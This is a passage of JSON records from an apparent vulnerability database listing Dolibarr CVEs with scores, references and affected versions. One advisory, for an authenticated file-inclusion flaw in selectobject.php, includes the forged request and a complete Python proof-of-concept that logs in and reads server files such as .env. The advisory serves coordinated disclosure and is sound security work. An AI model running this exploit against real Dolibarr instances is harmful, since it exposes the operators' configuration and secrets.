":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19209"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/115188?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability"
:"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19209","GHSA-jh3j-xfv2-f9m9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8xc8-p2ws-yqar"},{"url":"http://public2.vulnerable
code.io/api/vulnerabilities/21618?format=json","vulnerability_id":"VCID-96w1-vd5e-x7d1","summary":"Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php\n# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure\n\n## Target\n\nDolibarr Core (Tested on version 22.0.4)\n\n## Summary\n\nA Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).\n\n## Vulnerability Details\n\nThe vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.\n\n- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.\n- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. 
Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.\n\nThis allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.\n\n## Steps to Reproduce\n\n- Log in to the Dolibarr instance with any user account (no specific permissions required).\n- Intercept or manually forge a GET request to the following endpoint:\n\n```\nGET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0\n```\n\n- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.\n- *(Optional)* Run the attached Python PoC to automate the extraction:\n\n```\npython3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess\n```\n\n## Impact\n\nAn attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.\n\n## Suggested Mitigation\n\n- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.\n- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.\n- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.\n\n## Disclosure Policy & Assistance\n\nThe reporter is committed to coordinated vulnerability disclosure. 
This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.\n\nShould any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.\n\nThank you for the time and commitment to securing Dolibarr.\n\nBest Regards,\nVincent KHAYAT (cnf409)\n\n## Video PoC\n\nhttps://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844\n\n## PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Dolibarr selectobject.php authenticated LFI PoC\"\"\"\n\nimport argparse\nimport html\nimport re\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom http.cookiejar import CookieJar\n\nLOGIN_MARKERS = (\"Login @\", \"Identifiant @\")\nLOGOUT_MARKERS = (\"/user/logout.php\", \"Logout\", \"Mon tableau de bord\")\n\ndef request(\n    opener, base_url, method, path, params=None, data=None, timeout=15\n):\n    url = f\"{base_url.rstrip('/')}{path}\"\n    if params:\n        url = f\"{url}?{urllib.parse.urlencode(params)}\"\n    payload = urllib.parse.urlencode(data).encode(\"utf-8\") if data else None\n    req = urllib.request.Request(url, method=method.upper(), data=payload)\n    req.add_header(\"User-Agent\", \"dolibarr-lfi-poc/1.0-securitytest-for-dolibarr\")\n    req.add_header(\"Accept\", \"text/html,application/xhtml+xml\")\n    try:\n        with opener.open(req, timeout=timeout) as resp:\n            return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n    except urllib.error.HTTPError as err:\n        return err.code, err.read().decode(\"utf-8\", errors=\"replace\")\n\ndef extract_login_token(page):\n    for pattern in (\n        r'name=[\"\\']token[\"\\']\\s+value=[\"\\']([^\"\\']*)[\"\\']',\n        r'name=[\"\\']anti-csrf-newtoken[\"\\']\\s+content=[\"\\']([^\"\\']*)[\"\\']',\n    ):\n        match = re.search(pattern, page, 
flags=re.IGNORECASE)\n        if match:\n            return match.group(1)\n    return \"\"\n\ndef looks_authenticated(body):\n    return any(marker in body for marker in LOGOUT_MARKERS)\n\ndef clean_included_output(body):\n    for marker in (\n        \"<br />\\n<b>Warning\",\n        \"<br />\\r\\n<b>Warning\",\n        \"<br />\\n<b>Fatal error\",\n        \"<br />\\r\\n<b>Fatal error\",\n    ):\n        pos = body.find(marker)\n        if pos != -1:\n            return body[:pos].rstrip()\n    return body.rstrip()\n\ndef login(opener, base_url, username, password):\n    code, login_page = request(opener, base_url, \"GET\", \"/\")\n    if code >= 400:\n        return False, f\"HTTP {code} on login page\"\n    token = extract_login_token(login_page)\n    code, after_login = request(\n        opener,\n        base_url,\n        \"POST\",\n        \"/index.php?mainmenu=home\",\n        data={\n            \"token\": token,\n            \"actionlogin\": \"login\",\n            \"loginfunction\": \"loginfunction\",\n            \"username\": username,\n            \"password\": password,\n        },\n    )\n    if code >= 400:\n        return False, f\"HTTP {code} on login request\"\n    if looks_authenticated(after_login):\n        return True, \"\"\n    code, home = request(opener, base_url, \"GET\", \"/index.php?mainmenu=home\")\n    if code < 400 and looks_authenticated(home):\n        return True, \"\"\n    return False, \"Invalid username or password\"\n\ndef read_file(opener, base_url, relative_path):\n    status, body = request(\n        opener,\n        base_url,\n        \"GET\",\n        \"/core/ajax/selectobject.php\",\n        params={\n            \"outjson\": \"0\",\n            \"htmlname\": \"x\",\n            \"objectdesc\": f\"A:{relative_path}:0\",\n        },\n    )\n    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):\n        raise RuntimeError(\"Session expired or not authenticated\")\n    return status, 
body, clean_included_output(body)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(\n        description=\"Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4).\"\n    )\n    parser.add_argument(\n        \"--url\",\n        default=\"http://127.0.0.1:8080\",\n        help=\"Dolibarr base URL (default: http://127.0.0.1:8080)\",\n    )\n    parser.add_argument(\"--username\", required=True, help=\"Dolibarr username\")\n    parser.add_argument(\"--password\", required=True, help=\"Dolibarr password\")\n    parser.add_argument(\n        \"--file\",\n        dest=\"target_file\",\n        required=True,\n        help=\"Target file to read (e.g. conf/.htaccess).\",\n    )\n    return parser.parse_args()\n\ndef print_result(path, status, raw, clean):\n    print(f\"\\n[+] HTTP status: {status}\")\n    print(f\"[+] Requested file: {path}\")\n    print(\"=\" * 80)\n    if clean:\n        print(html.unescape(clean))\n    else:\n        print(\"(No readable output extracted)\")\n    print(\"=\" * 80)\n    if clean != raw.rstrip():\n        print(\"[i] PHP warnings/fatal output were trimmed from display.\")\n\ndef summarize_error_body(body, limit=1200):\n    text = html.unescape(body).strip()\n    if not text:\n        return \"(Empty response body)\"\n    if len(text) > limit:\n        return text[:limit].rstrip() + \"\\n... [truncated]\"\n    return text\n\ndef main():\n    args = parse_args()\n    opener = urllib.request.build_opener(\n        urllib.request.HTTPCookieProcessor(CookieJar())\n    )\n    ok, reason = login(opener, args.url, args.username, args.password)\n    if not ok:\n        print(f\"[!] {reason}\")\n        return 1\n    print(\"[+] Login successful.\")\n    try:\n        status, raw, clean = read_file(opener, args.url, args.target_file)\n        if status >= 400:\n            print(f\"[!] 
HTTP {status} while reading target file.\")\n            print(\"=\" * 80)\n            print(summarize_error_body(raw))\n            print(\"=\" * 80)\n            return 1\n        print_result(args.target_file, status, raw, clean)\n        return 0\n    except Exception as exc:\n        print(f\"[!] Error: {exc}\")\n        return 1\n\nif __name__ == \"__main__\":\n    try:\n        raise SystemExit(main())\n    except KeyboardInterrupt:\n        print(\"\\nInterrupted.\")\n        raise SystemExit(130)\n```","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03195","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","sco
ring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036"},{"reference_url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r","reference_id":"GHSA-2mfj-r695-5h9r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r"}],"fixed_packages":[],"aliases":["CVE-2026-34036","GHSA-2mfj-r695-5h9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-96w1-vd5e-x7d1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55257?format=json","vulnerability_id":"VCID-9v1w-ayuw-wbhy","summary":"Dolibarr arbitrary commands execution\nThe admin panel in Dolibarr before 7.0.2 might allow remote attackers to execute arbitrary commands by leveraging support for updating the antivirus command and parameters used to scan file 
uploads.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092","reference_id":"","reference_type":"","scores":[{"value":"0.00426","scoring_system":"epss","scoring_elements":"0.62561","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability","reference_id":"","reference_t
ype":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/2","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/2"},{"reference_url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m","reference_id":"GHSA-6j62-m2vv-wc3m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km
-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10092","GHSA-6j62-m2vv-wc3m"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9v1w-ayuw-wbhy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62428?format=json","vulnerability_id":"VCID-bdx3-aeus-qkh7","summary":"Dolibarr SQL injection via the integer parameters qty and value_unit\nAn issue was discovered in Dolibarr through 7.0.0. 
expensereport/card.php in the expense reports module allows SQL injection via the integer parameters qty and value_unit.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"0.00707","scoring_system":"epss","scoring_elements":"0.72487","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-y
faw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16809","GHSA-h34q-878w-w96r"],"ris
k_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bdx3-aeus-qkh7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50498?format=json","vulnerability_id":"VCID-e3km-aqns-kkb4","summary":"Logic error in dolibarr/dolibarr\nIn dolibarr/dolibarr prior to 16.0 any low privileged users could update their login name which should only be updated by admin.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746","reference_id":"","reference_type":"","scores":[{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44028","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21"},{"reference_url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746","reference_id":
"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746"},{"reference_url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r","reference_id":"GHSA-8vq6-5f66-hp3r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0746","GHSA-8vq6-5